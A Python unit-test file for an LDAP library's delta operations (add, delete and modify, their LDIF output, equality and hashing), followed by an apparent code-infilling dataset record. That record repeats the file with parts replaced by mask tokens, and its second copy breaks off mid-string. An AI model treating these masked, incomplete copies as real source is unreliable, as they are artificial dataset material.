def testAddOpHashDifferent(self):
"""
Objects which are not equal have different hash.
"""
first_entry = entry.BaseLDAPEntry(
dn="ou=Duplicate Team, dc=example,dc=com",
attributes={"foo": ["one", "attributes"]},
)
second_entry = entry.BaseLDAPEntry(
dn="ou=Duplicate Team, dc=example,dc=com",
attributes={"foo": ["other", "attributes"]},
)
first = delta.AddOp(first_entry)
second = delta.AddOp(second_entry)
self.assertNotEqual(hash(first), hash(second))
def testAddOp_DNExists(self):
"""
It fails to perform the `add` operation for an existing entry.
"""
root = self.getRoot()
root.addChild(
rdn="ou=Existing Team",
attributes={
"objectClass": ["a", "b"],
"ou": ["HR"],
},
)
hr_entry = entry.BaseLDAPEntry(
dn="ou=Existing Team, dc=example,dc=com",
attributes={"foo": ["dont", "care"]},
)
sut = delta.AddOp(hr_entry)
deferred = sut.patch(root)
failure = self.failureResultOf(deferred)
self.assertIsInstance(failure.value, ldaperrors.LDAPEntryAlreadyExists)
def testRepr(self):
"""
Getting string representation
"""
sut = delta.AddOp(
entry.BaseLDAPEntry(
dn="dc=example,dc=com",
attributes={
"bar": ["foo"],
"foo": ["bar"],
},
)
)
self.assertEqual(
repr(sut),
"AddOp(BaseLDAPEntry('dc=example,dc=com', "
"{'bar': ['foo'], 'foo': ['bar']}))",
)
class TestDeleteOpLDIF(OperationTestCase):
"""
Unit tests for DeleteOp.
"""
def testAsLDIF(self):
"""
It return the LDIF representation of the delete operation.
"""
sut = delta.DeleteOp("dc=example,dc=com")
result = sut.asLDIF()
self.assertEqual(
b"""dn: dc=example,dc=com
changetype: delete
""",
result,
)
def testDeleteOpEqualitySameDN(self):
"""
Objects are equal when the have the same DN.
"""
first_entry = entry.BaseLDAPEntry(dn="ou=Team, dc=example,dc=com")
second_entry = entry.BaseLDAPEntry(dn="ou=Team, dc=example,dc=com")
first = delta.DeleteOp(first_entry)
second = delta.DeleteOp(second_entry)
self.assertEqual(first, second)
def testDeleteOpEqualityEqualDN(self):
"""
DeleteOp objects are equal if their DNs are equal.
"""
first_dn = distinguishedname.DistinguishedName(
stringValue="ou=Team,dc=example,dc=com"
)
first = delta.DeleteOp(first_dn)
second_entry = entry.BaseLDAPEntry(dn="ou=Team, dc=example, dc=com")
second = delta.DeleteOp(second_entry)
third = delta.DeleteOp("ou=Team, dc=example,dc=com")
self.assertEqual(first, second)
self.assertEqual(first, third)
def testDeleteOpInequalityDifferentEntry(self):
"""
DeleteOp objects are not equal when the have different LDAP entries.
"""
first_entry = entry.BaseLDAPEntry(dn="ou=Team, dc=example,dc=com")
second_entry = entry.BaseLDAPEntry(dn="ou=Cowboys, dc=example,dc=com")
first = delta.DeleteOp(first_entry)
second = delta.DeleteOp(second_entry)
self.assertNotEqual(first, second)
def testDeleteOpInequalityNoEntryObject(self):
"""
DeleteOp objects is not equal with random objects.
"""
team_entry = entry.BaseLDAPEntry(dn="ou=Team, dc=example,dc=com")
sut = delta.DeleteOp(team_entry)
self.assertNotEqual(sut, "ou=Team, dc=example,dc=com")
def testDeleteOpHashSimilar(self):
"""
Objects which are equal have the same hash.
"""
first_entry = entry.BaseLDAPEntry(dn="ou=Team, dc=example,dc=com")
second_entry = entry.BaseLDAPEntry(dn="ou=Team, dc=example,dc=com")
first = delta.DeleteOp(first_entry)
second = delta.DeleteOp(second_entry)
self.assertEqual(hash(first), hash(second))
def testDeleteOpHashDifferent(self):
"""
Objects which are not equal have different hash.
"""
first_entry = entry.BaseLDAPEntry(dn="ou=Team, dc=example,dc=com")
second_entry = entry.BaseLDAPEntry(dn="ou=Cowboys, dc=example,dc=com")
first = delta.DeleteOp(first_entry)
second = delta.DeleteOp(second_entry)
self.assertNotEqual(hash(first), hash(second))
def testDeleteOp_DNNotFound(self):
"""
If fail to delete when the RDN does not exists.
"""
root = self.getRoot()
sut = delta.DeleteOp("cn=nope,dc=example,dc=com")
deferred = sut.patch(root)
failure = self.failureResultOf(deferred)
self.assertIsInstance(failure.value, ldaperrors.LDAPNoSuchObject)
def testDeleteOpInvalidDN(self):
"""
Invalid type of DN raises AssertionError
"""
self.assertRaises(AssertionError, delta.DeleteOp, 0)
def testRepr(self):
"""
Getting string representation
"""
sut = delta.DeleteOp("dc=example,dc=com")
self.assertEqual(repr(sut), "DeleteOp('dc=example,dc=com')")
class TestModifyOp(OperationTestCase):
"""
Unit tests for ModifyOp.
"""
def testAsLDIF(self):
"""
It will return a LDIF representation of the contained operations.
"""
sut = delta.ModifyOp(
"cn=Paula Jensen, ou=Dev Ops, dc=airius, dc=com",
[
delta.Add(
"postaladdress",
["123 Anystreet $ Sunnyvale, CA $ 94086"],
),
delta.Delete("description"),
delta.Replace(
"telephonenumber",
["+1 408 555 1234", "+1 408 555 5678"],
),
delta.Delete("facsimiletelephonenumber", ["+1 408 555 9876"]),
],
)
result = sut.asLDIF()
self.assertEqual(
b"""dn: cn=Paula Jensen,ou=Dev Ops,dc=airius,dc=com
changetype: modify
add: postaladdress
postaladdress: 123 Anystreet $ Sunnyvale, CA $ 94086
-
delete: description
-
replace: telephonenumber
telephonenumber: +1 408 555 1234
telephonenumber: +1 408 555 5678
-
delete: facsimiletelephonenumber
facsimiletelephonenumber: +1 408 555 9876
-
""",
result,
)
def testInequalityDiffertnDN(self):
"""
Modify operations for different DN are not equal.
"""
first = delta.ModifyOp(
"cn=john,dc=example,dc=com", [delta.Delete("description")]
)
second = delta.ModifyOp(
"cn=doe,dc=example,dc=com", [delta.Delete("description")]
)
self.assertNotEqual(first, second)
def testInequalityDifferentModifications(self):
"""
Modify operations with different modifications are not equal
"""
first = delta.ModifyOp("cn=john,dc=example,dc=com", [delta.Add("description")])
second = delta.ModifyOp(
"cn=john,dc=example,dc=com", [delta.Delete("description")]
)
self.assertNotEqual(first, second)
def testInequalityNotModifyOP(self):
"""
Modify operations are not equal with other object types.
"""
sut = delta.ModifyOp("cn=john,dc=example,dc=com", [delta.Delete("description")])
self.assertNotEqual("cn=john,dc=example,dc=com", sut)
def testInequalityDiffertnOperations(self):
"""
Modify operations for same DN but different operations are not equal.
"""
first = delta.ModifyOp(
"cn=john,dc=example,dc=com", [delta.Delete("description")]
)
second = delta.ModifyOp(
"cn=doe,dc=example,dc=com", [delta.Delete("homeDirectory")]
)
self.assertNotEqual(first, second)
def testHashEquality(self):
"""
Modify operations can be hashed and equal objects have the same
hash.
"""
first = delta.ModifyOp(
"cn=john,dc=example,dc=com", [delta.Delete("description")]
)
second = delta.ModifyOp(
"cn=john,dc=example,dc=com", [delta.Delete("description")]
)
self.assertEqual(first, second)
self.assertEqual(
first.asLDIF(),
second.asLDIF(),
"LDIF equality is a precondition for valid hash values",
)
self.assertEqual(hash(first), hash(second))
def testHashInequality(self):
"""
Different modify operations have different hash values.
"""
first = delta.ModifyOp(
"cn=john,dc=example,dc=com", [delta.Delete("description")]
)
second = delta.ModifyOp(
"cn=john,dc=example,dc=com", [delta.Delete("homeDirectory")]
)
self.assertNotEqual(first.asLDIF(), second.asLDIF())
self.assertNotEqual(hash(first), hash(second))
def testModifyOp_DNNotFound(self):
"""
If fail to modify when the RDN does not exists.
"""
root = self.getRoot()
sut = delta.ModifyOp(
"cn=nope,dc=example,dc=com",
[delta.Add("foo", ["bar"])],
)
deferred = sut.patch(root)
failure = self.failureResultOf(deferred)
self.assertIsInstance(failure.value, ldaperrors.LDAPNoSuchObject)
def testRepr(self):
"""
Getting string representation
"""
sut = delta.ModifyOp("cn=john,dc=example,dc=com", [delta.Delete("description")])
self.assertEqual(
repr(sut),
"ModifyOp(dn='cn=john,dc=example,dc=com', "
"modifications=[Delete('description', [])])",
)
class TestModificationComparison(unittest.TestCase):
def testEquality_Add_True(self):
a = delta.Add("k", ["b", "c", "d"])
b = delta.Add("k", ["b", "c", "d"])
self.assertEqual(a, b)
def testEquality_AddVsDelete_False(self):
a = delta.Add("k", ["b", "c", "d"])
b = delta.Delete("k", ["b", "c", "d"])
self.assertNotEqual(a, b)
def testEquality_AttributeSet_False(self):
a = delta.Add("k", ["b", "c", "d"])
b = attributeset.LDAPAttributeSet("k", ["b", "c", "d"])
self.assertNotEqual(a, b)
def testEquality_List_False(self):
a = delta.Add("k", ["b", "c", "d"])
b = ["b", "c", "d"]
self.assertNotEqual(a, b)
|
flexible
|
{
"blob_id": "8054ccb07d0130b75927a4bb9b712ce3d564b8fe",
"index": 4702,
"step-1": "<mask token>\n\n\nclass TestModificationOpLDIF(unittest.TestCase):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def testReplaceAll(self):\n m = delta.Replace('thud')\n self.assertEqual(m.asLDIF(), b'replace: thud\\n-\\n')\n <mask token>\n\n\nclass OperationTestCase(unittest.TestCase):\n \"\"\"\n Test case for operations on a LDAP tree.\n \"\"\"\n\n def getRoot(self):\n \"\"\"\n Returns a new LDAP root for dc=example,dc=com.\n \"\"\"\n return inmemory.ReadOnlyInMemoryLDAPEntry(dn=distinguishedname.\n DistinguishedName('dc=example,dc=com'))\n\n\nclass TestAddOpLDIF(OperationTestCase):\n \"\"\"\n Unit tests for `AddOp`.\n \"\"\"\n\n def testAsLDIF(self):\n \"\"\"\n It will return the LDIF representation of the operation.\n \"\"\"\n sut = delta.AddOp(entry.BaseLDAPEntry(dn='dc=example,dc=com',\n attributes={'foo': ['bar', 'baz'], 'quux': ['thud']}))\n result = sut.asLDIF()\n self.assertEqual(\n b'dn: dc=example,dc=com\\nchangetype: add\\nfoo: bar\\nfoo: baz\\nquux: thud\\n\\n'\n , result)\n\n def testAddOpEqualitySameEntry(self):\n \"\"\"\n Objects are equal when the have the same LDAP entry.\n \"\"\"\n first_entry = entry.BaseLDAPEntry(dn=\n 'ou=Duplicate Team, dc=example,dc=com', attributes={'foo': [\n 'same', 'attributes']})\n second_entry = entry.BaseLDAPEntry(dn=\n 'ou=Duplicate Team, dc=example,dc=com', attributes={'foo': [\n 'same', 'attributes']})\n first = delta.AddOp(first_entry)\n second = delta.AddOp(second_entry)\n self.assertEqual(first, second)\n\n def testAddOpInequalityDifferentEntry(self):\n \"\"\"\n Objects are not equal when the have different LDAP entries.\n \"\"\"\n first_entry = entry.BaseLDAPEntry(dn=\n 'ou=First Team, dc=example,dc=com', attributes={'foo': ['same',\n 'attributes']})\n second_entry = entry.BaseLDAPEntry(dn=\n 'ou=First Team, dc=example,dc=com', attributes={'foo': ['other',\n 'attributes']})\n first = delta.AddOp(first_entry)\n second = delta.AddOp(second_entry)\n self.assertNotEqual(first, second)\n\n def testAddOpInequalityNoEntryObject(self):\n \"\"\"\n Objects is not equal with random objects.\n \"\"\"\n team_entry = entry.BaseLDAPEntry(dn=\n 'ou=Duplicate Team, dc=example,dc=com', attributes={'foo': [\n 'same', 'attributes']})\n sut = delta.AddOp(team_entry)\n self.assertNotEqual(sut, {'foo': ['same', 'attributes']})\n\n def testAddOpHashSimilar(self):\n \"\"\"\n Objects which are equal have the same hash.\n \"\"\"\n first_entry = entry.BaseLDAPEntry(dn=\n 'ou=Duplicate Team, dc=example,dc=com', attributes={'foo': [\n 'same', 'attributes']})\n second_entry = entry.BaseLDAPEntry(dn=\n 'ou=Duplicate Team, dc=example,dc=com', attributes={'foo': [\n 'same', 'attributes']})\n first = delta.AddOp(first_entry)\n second = delta.AddOp(second_entry)\n self.assertEqual(hash(first), hash(second))\n\n def testAddOpHashDifferent(self):\n \"\"\"\n Objects which are not equal have different hash.\n \"\"\"\n first_entry = entry.BaseLDAPEntry(dn=\n 'ou=Duplicate Team, dc=example,dc=com', attributes={'foo': [\n 'one', 'attributes']})\n second_entry = entry.BaseLDAPEntry(dn=\n 'ou=Duplicate Team, dc=example,dc=com', attributes={'foo': [\n 'other', 'attributes']})\n first = delta.AddOp(first_entry)\n second = delta.AddOp(second_entry)\n self.assertNotEqual(hash(first), hash(second))\n\n def testAddOp_DNExists(self):\n \"\"\"\n It fails to perform the `add` operation for an existing entry.\n \"\"\"\n root = self.getRoot()\n root.addChild(rdn='ou=Existing Team', attributes={'objectClass': [\n 'a', 'b'], 'ou': ['HR']})\n hr_entry = entry.BaseLDAPEntry(dn=\n 'ou=Existing Team, dc=example,dc=com', attributes={'foo': [\n 'dont', 'care']})\n sut = delta.AddOp(hr_entry)\n deferred = sut.patch(root)\n failure = self.failureResultOf(deferred)\n self.assertIsInstance(failure.value, ldaperrors.LDAPEntryAlreadyExists)\n\n def testRepr(self):\n \"\"\"\n Getting string representation\n \"\"\"\n sut = delta.AddOp(entry.BaseLDAPEntry(dn='dc=example,dc=com',\n attributes={'bar': ['foo'], 'foo': ['bar']}))\n self.assertEqual(repr(sut),\n \"AddOp(BaseLDAPEntry('dc=example,dc=com', {'bar': ['foo'], 'foo': ['bar']}))\"\n )\n\n\nclass TestDeleteOpLDIF(OperationTestCase):\n \"\"\"\n Unit tests for DeleteOp.\n \"\"\"\n\n def testAsLDIF(self):\n \"\"\"\n It return the LDIF representation of the delete operation.\n \"\"\"\n sut = delta.DeleteOp('dc=example,dc=com')\n result = sut.asLDIF()\n self.assertEqual(b'dn: dc=example,dc=com\\nchangetype: delete\\n\\n',\n result)\n\n def testDeleteOpEqualitySameDN(self):\n \"\"\"\n Objects are equal when the have the same DN.\n \"\"\"\n first_entry = entry.BaseLDAPEntry(dn='ou=Team, dc=example,dc=com')\n second_entry = entry.BaseLDAPEntry(dn='ou=Team, dc=example,dc=com')\n first = delta.DeleteOp(first_entry)\n second = delta.DeleteOp(second_entry)\n self.assertEqual(first, second)\n\n def testDeleteOpEqualityEqualDN(self):\n \"\"\"\n DeleteOp objects are equal if their DNs are equal.\n \"\"\"\n first_dn = distinguishedname.DistinguishedName(stringValue=\n 'ou=Team,dc=example,dc=com')\n first = delta.DeleteOp(first_dn)\n second_entry = entry.BaseLDAPEntry(dn='ou=Team, dc=example, dc=com')\n second = delta.DeleteOp(second_entry)\n third = delta.DeleteOp('ou=Team, dc=example,dc=com')\n self.assertEqual(first, second)\n self.assertEqual(first, third)\n\n def testDeleteOpInequalityDifferentEntry(self):\n \"\"\"\n DeleteOp objects are not equal when the have different LDAP entries.\n \"\"\"\n first_entry = entry.BaseLDAPEntry(dn='ou=Team, dc=example,dc=com')\n second_entry = entry.BaseLDAPEntry(dn='ou=Cowboys, dc=example,dc=com')\n first = delta.DeleteOp(first_entry)\n second = delta.DeleteOp(second_entry)\n self.assertNotEqual(first, second)\n\n def testDeleteOpInequalityNoEntryObject(self):\n \"\"\"\n DeleteOp objects is not equal with random objects.\n \"\"\"\n team_entry = entry.BaseLDAPEntry(dn='ou=Team, dc=example,dc=com')\n sut = delta.DeleteOp(team_entry)\n self.assertNotEqual(sut, 'ou=Team, dc=example,dc=com')\n\n def testDeleteOpHashSimilar(self):\n \"\"\"\n Objects which are equal have the same hash.\n \"\"\"\n first_entry = entry.BaseLDAPEntry(dn='ou=Team, dc=example,dc=com')\n second_entry = entry.BaseLDAPEntry(dn='ou=Team, dc=example,dc=com')\n first = delta.DeleteOp(first_entry)\n second = delta.DeleteOp(second_entry)\n self.assertEqual(hash(first), hash(second))\n\n def testDeleteOpHashDifferent(self):\n \"\"\"\n Objects which are not equal have different hash.\n \"\"\"\n first_entry = entry.BaseLDAPEntry(dn='ou=Team, dc=example,dc=com')\n second_entry = entry.BaseLDAPEntry(dn='ou=Cowboys, dc=example,dc=com')\n first = delta.DeleteOp(first_entry)\n second = delta.DeleteOp(second_entry)\n self.assertNotEqual(hash(first), hash(second))\n\n def testDeleteOp_DNNotFound(self):\n \"\"\"\n If fail to delete when the RDN does not exists.\n \"\"\"\n root = self.getRoot()\n sut = delta.DeleteOp('cn=nope,dc=example,dc=com')\n deferred = sut.patch(root)\n failure = self.failureResultOf(deferred)\n self.assertIsInstance(failure.value, ldaperrors.LDAPNoSuchObject)\n\n def testDeleteOpInvalidDN(self):\n \"\"\"\n Invalid type of DN raises AssertionError\n \"\"\"\n self.assertRaises(AssertionError, delta.DeleteOp, 0)\n\n def testRepr(self):\n \"\"\"\n Getting string representation\n \"\"\"\n sut = delta.DeleteOp('dc=example,dc=com')\n self.assertEqual(repr(sut), \"DeleteOp('dc=example,dc=com')\")\n\n\nclass TestModifyOp(OperationTestCase):\n \"\"\"\n Unit tests for ModifyOp.\n \"\"\"\n\n def testAsLDIF(self):\n \"\"\"\n It will return a LDIF representation of the contained operations.\n \"\"\"\n sut = delta.ModifyOp('cn=Paula Jensen, ou=Dev Ops, dc=airius, dc=com',\n [delta.Add('postaladdress', [\n '123 Anystreet $ Sunnyvale, CA $ 94086']), delta.Delete(\n 'description'), delta.Replace('telephonenumber', [\n '+1 408 555 1234', '+1 408 555 5678']), delta.Delete(\n 'facsimiletelephonenumber', ['+1 408 555 9876'])])\n result = sut.asLDIF()\n self.assertEqual(\n b'dn: cn=Paula Jensen,ou=Dev Ops,dc=airius,dc=com\\nchangetype: modify\\nadd: postaladdress\\npostaladdress: 123 Anystreet $ Sunnyvale, CA $ 94086\\n-\\ndelete: description\\n-\\nreplace: telephonenumber\\ntelephonenumber: +1 408 555 1234\\ntelephonenumber: +1 408 555 5678\\n-\\ndelete: facsimiletelephonenumber\\nfacsimiletelephonenumber: +1 408 555 9876\\n-\\n\\n'\n , result)\n\n def testInequalityDiffertnDN(self):\n \"\"\"\n Modify operations for different DN are not equal.\n \"\"\"\n first = delta.ModifyOp('cn=john,dc=example,dc=com', [delta.Delete(\n 'description')])\n second = delta.ModifyOp('cn=doe,dc=example,dc=com', [delta.Delete(\n 'description')])\n self.assertNotEqual(first, second)\n\n def testInequalityDifferentModifications(self):\n \"\"\"\n Modify operations with different modifications are not equal\n \"\"\"\n first = delta.ModifyOp('cn=john,dc=example,dc=com', [delta.Add(\n 'description')])\n second = delta.ModifyOp('cn=john,dc=example,dc=com', [delta.Delete(\n 'description')])\n self.assertNotEqual(first, second)\n\n def testInequalityNotModifyOP(self):\n \"\"\"\n Modify operations are not equal with other object types.\n \"\"\"\n sut = delta.ModifyOp('cn=john,dc=example,dc=com', [delta.Delete(\n 'description')])\n self.assertNotEqual('cn=john,dc=example,dc=com', sut)\n\n def testInequalityDiffertnOperations(self):\n \"\"\"\n Modify operations for same DN but different operations are not equal.\n \"\"\"\n first = delta.ModifyOp('cn=john,dc=example,dc=com', [delta.Delete(\n 'description')])\n second = delta.ModifyOp('cn=doe,dc=example,dc=com', [delta.Delete(\n 'homeDirectory')])\n self.assertNotEqual(first, second)\n\n def testHashEquality(self):\n \"\"\"\n Modify operations can be hashed and equal objects have the same\n hash.\n \"\"\"\n first = delta.ModifyOp('cn=john,dc=example,dc=com', [delta.Delete(\n 'description')])\n second = delta.ModifyOp('cn=john,dc=example,dc=com', [delta.Delete(\n 'description')])\n self.assertEqual(first, second)\n self.assertEqual(first.asLDIF(), second.asLDIF(),\n 'LDIF equality is a precondition for valid hash values')\n self.assertEqual(hash(first), hash(second))\n\n def testHashInequality(self):\n \"\"\"\n Different modify operations have different hash values.\n \"\"\"\n first = delta.ModifyOp('cn=john,dc=example,dc=com', [delta.Delete(\n 'description')])\n second = delta.ModifyOp('cn=john,dc=example,dc=com', [delta.Delete(\n 'homeDirectory')])\n self.assertNotEqual(first.asLDIF(), second.asLDIF())\n self.assertNotEqual(hash(first), hash(second))\n\n def testModifyOp_DNNotFound(self):\n \"\"\"\n If fail to modify when the RDN does not exists.\n \"\"\"\n root = self.getRoot()\n sut = delta.ModifyOp('cn=nope,dc=example,dc=com', [delta.Add('foo',\n ['bar'])])\n deferred = sut.patch(root)\n failure = self.failureResultOf(deferred)\n self.assertIsInstance(failure.value, ldaperrors.LDAPNoSuchObject)\n\n def testRepr(self):\n \"\"\"\n Getting string representation\n \"\"\"\n sut = delta.ModifyOp('cn=john,dc=example,dc=com', [delta.Delete(\n 'description')])\n self.assertEqual(repr(sut),\n \"ModifyOp(dn='cn=john,dc=example,dc=com', modifications=[Delete('description', [])])\"\n )\n\n\nclass TestModificationComparison(unittest.TestCase):\n\n def testEquality_Add_True(self):\n a = delta.Add('k', ['b', 'c', 'd'])\n b = delta.Add('k', ['b', 'c', 'd'])\n self.assertEqual(a, b)\n\n def testEquality_AddVsDelete_False(self):\n a = delta.Add('k', ['b', 'c', 'd'])\n b = delta.Delete('k', ['b', 'c', 'd'])\n self.assertNotEqual(a, b)\n\n def testEquality_AttributeSet_False(self):\n a = delta.Add('k', ['b', 'c', 'd'])\n b = attributeset.LDAPAttributeSet('k', ['b', 'c', 'd'])\n self.assertNotEqual(a, b)\n\n def testEquality_List_False(self):\n a = delta.Add('k', ['b', 'c', 'd'])\n b = ['b', 'c', 'd']\n self.assertNotEqual(a, b)\n",
"step-2": "<mask token>\n\n\nclass TestModificationOpLDIF(unittest.TestCase):\n <mask token>\n\n def testDelete(self):\n m = delta.Delete('foo', ['bar', 'baz'])\n self.assertEqual(m.asLDIF(), b'delete: foo\\nfoo: bar\\nfoo: baz\\n-\\n')\n <mask token>\n\n def testReplace(self):\n m = delta.Replace('foo', ['bar', 'baz'])\n self.assertEqual(m.asLDIF(), b'replace: foo\\nfoo: bar\\nfoo: baz\\n-\\n')\n\n def testReplaceAll(self):\n m = delta.Replace('thud')\n self.assertEqual(m.asLDIF(), b'replace: thud\\n-\\n')\n\n def testAddBase64(self):\n \"\"\"\n LDIF attribute representation is base64 encoded\n if attribute value contains nonprintable characters\n or starts with reserved characters\n \"\"\"\n m = delta.Add('attr', [':value1', 'value\\n\\r2'])\n self.assertEqual(m.asLDIF(),\n b'add: attr\\nattr:: OnZhbHVlMQ==\\nattr:: dmFsdWUKDTI=\\n-\\n')\n\n\nclass OperationTestCase(unittest.TestCase):\n \"\"\"\n Test case for operations on a LDAP tree.\n \"\"\"\n\n def getRoot(self):\n \"\"\"\n Returns a new LDAP root for dc=example,dc=com.\n \"\"\"\n return inmemory.ReadOnlyInMemoryLDAPEntry(dn=distinguishedname.\n DistinguishedName('dc=example,dc=com'))\n\n\nclass TestAddOpLDIF(OperationTestCase):\n \"\"\"\n Unit tests for `AddOp`.\n \"\"\"\n\n def testAsLDIF(self):\n \"\"\"\n It will return the LDIF representation of the operation.\n \"\"\"\n sut = delta.AddOp(entry.BaseLDAPEntry(dn='dc=example,dc=com',\n attributes={'foo': ['bar', 'baz'], 'quux': ['thud']}))\n result = sut.asLDIF()\n self.assertEqual(\n b'dn: dc=example,dc=com\\nchangetype: add\\nfoo: bar\\nfoo: baz\\nquux: thud\\n\\n'\n , result)\n\n def testAddOpEqualitySameEntry(self):\n \"\"\"\n Objects are equal when the have the same LDAP entry.\n \"\"\"\n first_entry = entry.BaseLDAPEntry(dn=\n 'ou=Duplicate Team, dc=example,dc=com', attributes={'foo': [\n 'same', 'attributes']})\n second_entry = entry.BaseLDAPEntry(dn=\n 'ou=Duplicate Team, dc=example,dc=com', attributes={'foo': [\n 'same', 'attributes']})\n first = delta.AddOp(first_entry)\n second = delta.AddOp(second_entry)\n self.assertEqual(first, second)\n\n def testAddOpInequalityDifferentEntry(self):\n \"\"\"\n Objects are not equal when the have different LDAP entries.\n \"\"\"\n first_entry = entry.BaseLDAPEntry(dn=\n 'ou=First Team, dc=example,dc=com', attributes={'foo': ['same',\n 'attributes']})\n second_entry = entry.BaseLDAPEntry(dn=\n 'ou=First Team, dc=example,dc=com', attributes={'foo': ['other',\n 'attributes']})\n first = delta.AddOp(first_entry)\n second = delta.AddOp(second_entry)\n self.assertNotEqual(first, second)\n\n def testAddOpInequalityNoEntryObject(self):\n \"\"\"\n Objects is not equal with random objects.\n \"\"\"\n team_entry = entry.BaseLDAPEntry(dn=\n 'ou=Duplicate Team, dc=example,dc=com', attributes={'foo': [\n 'same', 'attributes']})\n sut = delta.AddOp(team_entry)\n self.assertNotEqual(sut, {'foo': ['same', 'attributes']})\n\n def testAddOpHashSimilar(self):\n \"\"\"\n Objects which are equal have the same hash.\n \"\"\"\n first_entry = entry.BaseLDAPEntry(dn=\n 'ou=Duplicate Team, dc=example,dc=com', attributes={'foo': [\n 'same', 'attributes']})\n second_entry = entry.BaseLDAPEntry(dn=\n 'ou=Duplicate Team, dc=example,dc=com', attributes={'foo': [\n 'same', 'attributes']})\n first = delta.AddOp(first_entry)\n second = delta.AddOp(second_entry)\n self.assertEqual(hash(first), hash(second))\n\n def testAddOpHashDifferent(self):\n \"\"\"\n Objects which are not equal have different hash.\n \"\"\"\n first_entry = entry.BaseLDAPEntry(dn=\n 'ou=Duplicate Team, dc=example,dc=com', attributes={'foo': [\n 'one', 'attributes']})\n second_entry = entry.BaseLDAPEntry(dn=\n 'ou=Duplicate Team, dc=example,dc=com', attributes={'foo': [\n 'other', 'attributes']})\n first = delta.AddOp(first_entry)\n second = delta.AddOp(second_entry)\n self.assertNotEqual(hash(first), hash(second))\n\n def testAddOp_DNExists(self):\n \"\"\"\n It fails to perform the `add` operation for an existing entry.\n \"\"\"\n root = self.getRoot()\n root.addChild(rdn='ou=Existing Team', attributes={'objectClass': [\n 'a', 'b'], 'ou': ['HR']})\n hr_entry = entry.BaseLDAPEntry(dn=\n 'ou=Existing Team, dc=example,dc=com', attributes={'foo': [\n 'dont', 'care']})\n sut = delta.AddOp(hr_entry)\n deferred = sut.patch(root)\n failure = self.failureResultOf(deferred)\n self.assertIsInstance(failure.value, ldaperrors.LDAPEntryAlreadyExists)\n\n def testRepr(self):\n \"\"\"\n Getting string representation\n \"\"\"\n sut = delta.AddOp(entry.BaseLDAPEntry(dn='dc=example,dc=com',\n attributes={'bar': ['foo'], 'foo': ['bar']}))\n self.assertEqual(repr(sut),\n \"AddOp(BaseLDAPEntry('dc=example,dc=com', {'bar': ['foo'], 'foo': ['bar']}))\"\n )\n\n\nclass TestDeleteOpLDIF(OperationTestCase):\n \"\"\"\n Unit tests for DeleteOp.\n \"\"\"\n\n def testAsLDIF(self):\n \"\"\"\n It return the LDIF representation of the delete operation.\n \"\"\"\n sut = delta.DeleteOp('dc=example,dc=com')\n result = sut.asLDIF()\n self.assertEqual(b'dn: dc=example,dc=com\\nchangetype: delete\\n\\n',\n result)\n\n def testDeleteOpEqualitySameDN(self):\n \"\"\"\n Objects are equal when the have the same DN.\n \"\"\"\n first_entry = entry.BaseLDAPEntry(dn='ou=Team, dc=example,dc=com')\n second_entry = entry.BaseLDAPEntry(dn='ou=Team, dc=example,dc=com')\n first = delta.DeleteOp(first_entry)\n second = delta.DeleteOp(second_entry)\n self.assertEqual(first, second)\n\n def testDeleteOpEqualityEqualDN(self):\n \"\"\"\n DeleteOp objects are equal if their DNs are equal.\n \"\"\"\n first_dn = distinguishedname.DistinguishedName(stringValue=\n 'ou=Team,dc=example,dc=com')\n first = delta.DeleteOp(first_dn)\n second_entry = entry.BaseLDAPEntry(dn='ou=Team, dc=example, dc=com')\n second = delta.DeleteOp(second_entry)\n third = delta.DeleteOp('ou=Team, dc=example,dc=com')\n self.assertEqual(first, second)\n self.assertEqual(first, third)\n\n def testDeleteOpInequalityDifferentEntry(self):\n \"\"\"\n DeleteOp objects are not equal when the have different LDAP entries.\n \"\"\"\n first_entry = entry.BaseLDAPEntry(dn='ou=Team, dc=example,dc=com')\n second_entry = entry.BaseLDAPEntry(dn='ou=Cowboys, dc=example,dc=com')\n first = delta.DeleteOp(first_entry)\n second = delta.DeleteOp(second_entry)\n self.assertNotEqual(first, second)\n\n def testDeleteOpInequalityNoEntryObject(self):\n \"\"\"\n DeleteOp objects is not equal with random objects.\n \"\"\"\n team_entry = entry.BaseLDAPEntry(dn='ou=Team, dc=example,dc=com')\n sut = delta.DeleteOp(team_entry)\n self.assertNotEqual(sut, 'ou=Team, dc=example,dc=com')\n\n def testDeleteOpHashSimilar(self):\n \"\"\"\n Objects which are equal have the same hash.\n \"\"\"\n first_entry = entry.BaseLDAPEntry(dn='ou=Team, dc=example,dc=com')\n second_entry = entry.BaseLDAPEntry(dn='ou=Team, dc=example,dc=com')\n first = delta.DeleteOp(first_entry)\n second = delta.DeleteOp(second_entry)\n self.assertEqual(hash(first), hash(second))\n\n def testDeleteOpHashDifferent(self):\n \"\"\"\n Objects which are not equal have different hash.\n \"\"\"\n first_entry = entry.BaseLDAPEntry(dn='ou=Team, dc=example,dc=com')\n second_entry = entry.BaseLDAPEntry(dn='ou=Cowboys, dc=example,dc=com')\n first = delta.DeleteOp(first_entry)\n second = delta.DeleteOp(second_entry)\n self.assertNotEqual(hash(first), hash(second))\n\n def testDeleteOp_DNNotFound(self):\n \"\"\"\n If fail to delete when the RDN does not exists.\n \"\"\"\n root = self.getRoot()\n sut = delta.DeleteOp('cn=nope,dc=example,dc=com')\n deferred = sut.patch(root)\n failure = self.failureResultOf(deferred)\n self.assertIsInstance(failure.value, ldaperrors.LDAPNoSuchObject)\n\n def testDeleteOpInvalidDN(self):\n \"\"\"\n Invalid type of DN raises AssertionError\n \"\"\"\n self.assertRaises(AssertionError, delta.DeleteOp, 0)\n\n def testRepr(self):\n \"\"\"\n Getting string representation\n \"\"\"\n sut = delta.DeleteOp('dc=example,dc=com')\n self.assertEqual(repr(sut), \"DeleteOp('dc=example,dc=com')\")\n\n\nclass TestModifyOp(OperationTestCase):\n \"\"\"\n Unit tests for ModifyOp.\n \"\"\"\n\n def testAsLDIF(self):\n \"\"\"\n It will return a LDIF representation of the contained operations.\n \"\"\"\n sut = delta.ModifyOp('cn=Paula Jensen, ou=Dev Ops, dc=airius, dc=com',\n [delta.Add('postaladdress', [\n '123 Anystreet $ Sunnyvale, CA $ 94086']), delta.Delete(\n 'description'), delta.Replace('telephonenumber', [\n '+1 408 555 1234', '+1 408 555 5678']), delta.Delete(\n 'facsimiletelephonenumber', ['+1 408 555 9876'])])\n result = sut.asLDIF()\n self.assertEqual(\n b'dn: cn=Paula Jensen,ou=Dev Ops,dc=airius,dc=com\\nchangetype: modify\\nadd: postaladdress\\npostaladdress: 123 Anystreet $ Sunnyvale, CA $ 